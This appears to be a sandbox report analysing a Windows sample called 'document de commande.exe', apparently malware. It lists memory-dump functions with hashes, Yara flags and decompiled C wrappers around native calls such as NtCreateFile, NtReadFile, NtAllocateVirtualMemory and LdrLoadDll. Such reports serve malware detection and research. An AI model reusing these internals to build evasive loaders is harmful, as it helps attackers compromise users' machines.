                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    Chronological Activities

                                    Disassembly

                                    Code Analysis

                                    Reset < >

                                      Analysis Process: document de commande.exe PID: 3116 Parent PID: 6484 document de commande.exeCOMMON

                                      Executed Functions

                                      Function 06AF0040, Relevance: .2, Instructions: 150COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.686324887.0000000006AF0000.00000040.00000001.sdmp, Offset: 06AF0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 74781a28e5ece32f1f820d6e201f8acc9980d08962f162c3ad73979ea42e39dc
                                      • Instruction ID: 89f08914402cf98bc4de8be2182f6f600fcdc4a445014963fb1685f8f0b4898b
                                      • Opcode Fuzzy Hash: 74781a28e5ece32f1f820d6e201f8acc9980d08962f162c3ad73979ea42e39dc
                                      • Instruction Fuzzy Hash: 0C6109B0D5022ECFEB64DFA5C844BE9B7B2AF99304F1085E9D118A7241E7741AC5CF52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 06AF14E8, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(?,?,?,?), ref: 06AF154D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.686324887.0000000006AF0000.00000040.00000001.sdmp, Offset: 06AF0000, based on PE: false
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: f547129d40ca668705cedc8e760af1f05e030e878a06dbc8f79f9183a8d5151d
                                      • Instruction ID: 55380a4eeb05bb5edc344ef76f94c27e59dcee8bf464ae77270b4677e3ea0e7f
                                      • Opcode Fuzzy Hash: f547129d40ca668705cedc8e760af1f05e030e878a06dbc8f79f9183a8d5151d
                                      • Instruction Fuzzy Hash: 3D1103B5900349DFCB10DFA9D885BDEBFF8EB48320F14845AE559A7600C778A984CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 06AF14F0, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(?,?,?,?), ref: 06AF154D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.686324887.0000000006AF0000.00000040.00000001.sdmp, Offset: 06AF0000, based on PE: false
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: 8eab6d6921de500ff6e4ab66eb71201a7cc5cb90a54b80095dfdd74f5656e955
                                      • Instruction ID: 622bed3bb8a341eb338b6fa56be63869c351347cee753a421f52c550bd397d4b
                                      • Opcode Fuzzy Hash: 8eab6d6921de500ff6e4ab66eb71201a7cc5cb90a54b80095dfdd74f5656e955
                                      • Instruction Fuzzy Hash: FD11E2B5800349DFDB10DF99D885BDEBBF8EB48324F14841AE959A7600C778A944CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 003FD4C4, Relevance: .1, Instructions: 75COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.680958114.00000000003FD000.00000040.00000001.sdmp, Offset: 003FD000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42b137fab451aabfbe08c00fc71a01c825582a475881e05274c7c5b272063ed0
                                      • Instruction ID: 4e835ba28ca79167be6c0775ee653480743d5db3f9561a066ba4fe560d9f7036
                                      • Opcode Fuzzy Hash: 42b137fab451aabfbe08c00fc71a01c825582a475881e05274c7c5b272063ed0
                                      • Instruction Fuzzy Hash: 702137B2504248DFDB02DF14D9C4F36BF66FB88328F25C569EA090B646C336D846DBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0078D01C, Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.681076718.000000000078D000.00000040.00000001.sdmp, Offset: 0078D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5df8e5f7f6b0e11d874314ed3f75d9d192d546216729a62490ffbc93a937f4c0
                                      • Instruction ID: b5f10cb3aba0dd41a50f42a3eeb0c5029f69eedc1e9278e8239997e91f0dfe8f
                                      • Opcode Fuzzy Hash: 5df8e5f7f6b0e11d874314ed3f75d9d192d546216729a62490ffbc93a937f4c0
                                      • Instruction Fuzzy Hash: 4A21F571544244DFDB24EF24D9C4B26BB65FB84324F24C569D8494B286C73ADC47CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0078D1D4, Relevance: .1, Instructions: 72COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.681076718.000000000078D000.00000040.00000001.sdmp, Offset: 0078D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a6d0da8d862545e5926776ec4da4081020212a159991389d9f0be2df559f8dc3
                                      • Instruction ID: 752eb512465805fa52bfc1b2372feedbd56fed813fa78a8ffbda51a89db25ef7
                                      • Opcode Fuzzy Hash: a6d0da8d862545e5926776ec4da4081020212a159991389d9f0be2df559f8dc3
                                      • Instruction Fuzzy Hash: EC2107B1944244EFDB11EF54D9C0B26BBA5FB84324F24C66DD8094B286C73ADC46CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 003FD4BF, Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.680958114.00000000003FD000.00000040.00000001.sdmp, Offset: 003FD000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 917a5ae3d983fd734d8602945f9d5328e8532b02038ce25639f7386fa4c58ab9
                                      • Instruction ID: 6e2bdb52de113bdc9b7963d43ff06bad82fa6f2f1045f9e78bbf9b593aa698ac
                                      • Opcode Fuzzy Hash: 917a5ae3d983fd734d8602945f9d5328e8532b02038ce25639f7386fa4c58ab9
                                      • Instruction Fuzzy Hash: 7611E676804284DFCF12CF14D5C4B26BF72FB85324F24C6A9D9490B656C336D85ACBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0078D1CF, Relevance: .1, Instructions: 53COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.681076718.000000000078D000.00000040.00000001.sdmp, Offset: 0078D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: de1ca536cd1c41e12caa75795dfdbee05fb5903b243fce9bc442825e70aaeb29
                                      • Instruction ID: 8234d549afda7e7f91f83182715b8cafb49af60965c6330fd018cf4cbfd8b1bd
                                      • Opcode Fuzzy Hash: de1ca536cd1c41e12caa75795dfdbee05fb5903b243fce9bc442825e70aaeb29
                                      • Instruction Fuzzy Hash: 0C119D75944280DFDB11DF14D5C4B15FBB1FB84324F28C6ADD8494B696C33AD84ACB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0078D017, Relevance: .1, Instructions: 53COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.681076718.000000000078D000.00000040.00000001.sdmp, Offset: 0078D000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: de1ca536cd1c41e12caa75795dfdbee05fb5903b243fce9bc442825e70aaeb29
                                      • Instruction ID: c2e5cd44bacfae2d80a786c311583bdf4aec31f3ccb20d2e780c4baa8e4b7fd4
                                      • Opcode Fuzzy Hash: de1ca536cd1c41e12caa75795dfdbee05fb5903b243fce9bc442825e70aaeb29
                                      • Instruction Fuzzy Hash: 2011D075544280DFDB11DF14D5C4B15FB71FB44324F24C6A9D8494B696C33AD84ACB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 003FD745, Relevance: .0, Instructions: 45COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.680958114.00000000003FD000.00000040.00000001.sdmp, Offset: 003FD000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ae3a91c9e41b199a21b330f394b479a5d2dce3c7acc980e97158b887d71fd8c6
                                      • Instruction ID: dbc4041eae7192947b9a612963b074930d136b381cc9e684ced2bec6c3ff280e
                                      • Opcode Fuzzy Hash: ae3a91c9e41b199a21b330f394b479a5d2dce3c7acc980e97158b887d71fd8c6
                                      • Instruction Fuzzy Hash: D70147710087889AE7126E25CC88B72FB9CEF41338F19851AEF050F646C7799C48CAB1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 003FD744, Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.680958114.00000000003FD000.00000040.00000001.sdmp, Offset: 003FD000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fa2ff0d6f8ee6b22dfb8da0761ee7b19c92fd3c26dd932d682def90e3f565f44
                                      • Instruction ID: 41d0b8d1623c53b10509d6e9be34822a91ac097f3ed152ba349b3df4e774b3d6
                                      • Opcode Fuzzy Hash: fa2ff0d6f8ee6b22dfb8da0761ee7b19c92fd3c26dd932d682def90e3f565f44
                                      • Instruction Fuzzy Hash: C2F06271404748AFE7119E15DC88B62FBA8EB45734F18C45AEE085F786C3799C48CAB1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Function 00224351, Relevance: 3.5, Instructions: 3475COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.680704229.0000000000222000.00000002.00020000.sdmp, Offset: 00220000, based on PE: true
                                      • Associated: 00000000.00000002.680694335.0000000000220000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 55bf6ef78872b6171bb1d2180afd52579a81ba445c56d2af89bc6f7a20ae55a6
                                      • Instruction ID: 9ec65e34447b3052433f3e3634adb81c00dc733eec7317bb88849ca00f82763c
                                      • Opcode Fuzzy Hash: 55bf6ef78872b6171bb1d2180afd52579a81ba445c56d2af89bc6f7a20ae55a6
                                      • Instruction Fuzzy Hash: DE530E6144F7D16FC7138BB86CB16E27FB1AE5321471E45C7D4C08F0A3E2285AAAD762
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 06AF0412, Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.686324887.0000000006AF0000.00000040.00000001.sdmp, Offset: 06AF0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: !
                                      • API String ID: 0-2657877971
                                      • Opcode ID: 990bb95d7bac3067cdf97f5417c2af1b85c2ac609ebde1f9849b384a45fa6941
                                      • Instruction ID: a00fc2fe03ee318af2f019b1f8eb35bf9878b0a8e75eee44ee083ad15d868fa2
                                      • Opcode Fuzzy Hash: 990bb95d7bac3067cdf97f5417c2af1b85c2ac609ebde1f9849b384a45fa6941
                                      • Instruction Fuzzy Hash: 4F110474D15228CFDB64DFA4C865BE8F7B1AB4A305F0084E5E60DA7252C3B09AC6CF41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 002266FF, Relevance: .4, Instructions: 439COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E002266FF(void* __eax, void* __edx, void* __esi) {

				 *((intOrPtr*)(__esi + __eax)) =  *((intOrPtr*)(__esi + __eax)) + __eax;
			}



                                      0x00226701

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.680704229.0000000000222000.00000002.00020000.sdmp, Offset: 00220000, based on PE: true
                                      • Associated: 00000000.00000002.680694335.0000000000220000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a65b71bbc967a1245ac80fe38a4689f98907614a38b78bf8a59d9aef405ef06f
                                      • Instruction ID: ab38330c8b4e3e3fdf2be118313c821f9f1b2ab524d62e614281a328c3014e12
                                      • Opcode Fuzzy Hash: a65b71bbc967a1245ac80fe38a4689f98907614a38b78bf8a59d9aef405ef06f
                                      • Instruction Fuzzy Hash: A902CC6258E3D16FC7238B705CB96927FB09E5321471E49EBC4C2CF0A3D258195AD7A3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Analysis Process: document de commande.exe PID: 6756 Parent PID: 3116 document de commande.exeCOMMON

                                      Executed Functions

                                      Function 0041A40A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39filenativeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: 1JA$rMA$rMA
                                      • API String ID: 2738559852-782607585
                                      • Opcode ID: 571895879dee8461ac67ce286c4e5f0c1a859a7358de4b3622705bd20ceeeafb
                                      • Instruction ID: 6df61201d9433d8778168a83831c0736fcc7cf66abb1aeaa7c2dc064d6b57340
                                      • Opcode Fuzzy Hash: 571895879dee8461ac67ce286c4e5f0c1a859a7358de4b3622705bd20ceeeafb
                                      • Instruction Fuzzy Hash: ACF0F4B2200108AFCB14DF89CC80EEB77ADEF8C754F168248FA1D97241D630E8118BE0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A410, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
                                      			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a31
				_t6 =  &_a32; // 0x414d72
				_t12 =  &_a8; // 0x414d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                      0x0041a413
                                      0x0041a41f
                                      0x0041a427
                                      0x0041a42c
                                      0x0041a432
                                      0x0041a44d
                                      0x0041a455
                                      0x0041a459

                                      APIs
                                      • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID: 1JA$rMA$rMA
                                      • API String ID: 2738559852-782607585
                                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                      • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0040ACF0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E0041CC50( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D070(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2F0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B4A0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                      0x0040acf9
                                      0x0040ad0c
                                      0x0040ad0f
                                      0x0040ad14
                                      0x0040ad19
                                      0x0040ad23
                                      0x0040ad28
                                      0x0040ad2b
                                      0x0040ad2d
                                      0x0040ad35
                                      0x0040ad3a
                                      0x0040ad3a
                                      0x0040ad41
                                      0x0040ad49
                                      0x0040ad4c
                                      0x0040ad4e
                                      0x0040ad62
                                      0x00000000
                                      0x0040ad64
                                      0x0040ad6a
                                      0x0040ad1e
                                      0x0040ad1e
                                      0x0040ad1e

                                      APIs
                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Load
                                      • String ID:
                                      • API String ID: 2234796835-0
                                      • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                      • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                      • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                      • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A360, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                      0x0041a36f
                                      0x0041a377
                                      0x0041a3ad
                                      0x0041a3b1

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                      • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A35A, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 64%
                                      			E0041A35A(void* __eax, void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t26;
				void* _t37;

				asm("scasb");
				asm("aaa");
				_t20 = _a4;
				_t5 = _t20 + 0xc40; // 0xc40
				E0041AF60(_t37, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t26 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t26;
			}





                                      0x0041a35a
                                      0x0041a35c
                                      0x0041a363
                                      0x0041a36f
                                      0x0041a377
                                      0x0041a3ad
                                      0x0041a3b1

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 931a1fd33556899393102e116f90a739fe066eead889d2a52d463c25d15a1294
                                      • Instruction ID: 54a1b91e9f83a5620ee8a7ecbef602848a6f5ab7f6768b25ff6c4f72ddef8673
                                      • Opcode Fuzzy Hash: 931a1fd33556899393102e116f90a739fe066eead889d2a52d463c25d15a1294
                                      • Instruction Fuzzy Hash: 29F0C4B2214149AFCB18CF99D885CEB7BADFF8C314B15864DFA0C97212D634E855CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A540, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                      0x0041a543
                                      0x0041a54f
                                      0x0041a557
                                      0x0041a579
                                      0x00000000

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A48A, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 82%
                                      			E0041A48A(void* __edx, intOrPtr _a4, void* _a8) {
				void* _v117;
				long _t9;
				void* _t13;

				_t6 = _a4;
				_t3 = _t6 + 0x10; // 0x300
				_push(0xf2d4f965);
				_t4 = _t6 + 0xc50; // 0x40a943
				E0041AF60(_t13, _a4, _t4,  *_t3, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}






                                      0x0041a493
                                      0x0041a496
                                      0x0041a499
                                      0x0041a49f
                                      0x0041a4a7
                                      0x0041a4b5
                                      0x0041a4b9

                                      APIs
                                      • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: e4ccdfe49ed4723dfd73aeb38c6be87cd567d25dafdd85b3661fc5b9a251620a
                                      • Instruction ID: aa8a558cec250baee65c92f12daa83648964882f436c66b8d7c05aaea01e5d9a
                                      • Opcode Fuzzy Hash: e4ccdfe49ed4723dfd73aeb38c6be87cd567d25dafdd85b3661fc5b9a251620a
                                      • Instruction Fuzzy Hash: 77E08671500214BFD710DB94CC45EDB7768EF48360F15406AB91CA7241C530A5008690
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A490, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A490(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                      0x0041a493
                                      0x0041a496
                                      0x0041a49f
                                      0x0041a4a7
                                      0x0041a4b5
                                      0x0041a4b9

                                      APIs
                                      • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409AB0, Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                      • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                      • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                      • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A662, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 86%
                                      			E0041A662(void* __edx, void* _a3, long _a7, void* _a11) {
				char _v1;
				void* __ebp;
				long _t7;
				void* _t8;
				void* _t9;
				long _t11;

				_push(0x2e83478);
				_t11 = __edx + 1;
				if(_t11 >= 0) {
					_t8 = RtlAllocateHeap(_t9, _t7, _t11); // executed
					return _t8;
				} else {
					asm("lds esi, [edx]");
					__esi = 0x8b55d394;
					__ebp = __esp;
					__eax = _v1;
					_t3 = __eax + 0xc74; // 0xc74
					__esi = _t3;
					__eax = E0041AF60(__edi, _v1, __esi,  *((intOrPtr*)(__eax + 0x10)), 0, 0x35);
					__edx = _a11;
					__eax = _a7;
					__edx =  *__esi;
					__eax = RtlFreeHeap(_a3, _a7, _a11); // executed
					__esi = 0x8b55d394;
					__ebp = __ebp;
					return __eax;
				}
			}









                                      0x0041a662
                                      0x0041a667
                                      0x0041a669
                                      0x0041a65d
                                      0x0041a661
                                      0x0041a66b
                                      0x0041a66b
                                      0x0041a66d
                                      0x0041a671
                                      0x0041a673
                                      0x0041a67f
                                      0x0041a67f
                                      0x0041a687
                                      0x0041a68c
                                      0x0041a68f
                                      0x0041a699
                                      0x0041a69d
                                      0x0041a69f
                                      0x0041a6a0
                                      0x0041a6a1
                                      0x0041a6a1

                                      APIs
                                      • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                      • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.752388131.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateFree
                                      • String ID: 6EA
                                      • API String ID: 2488874121-1400015478
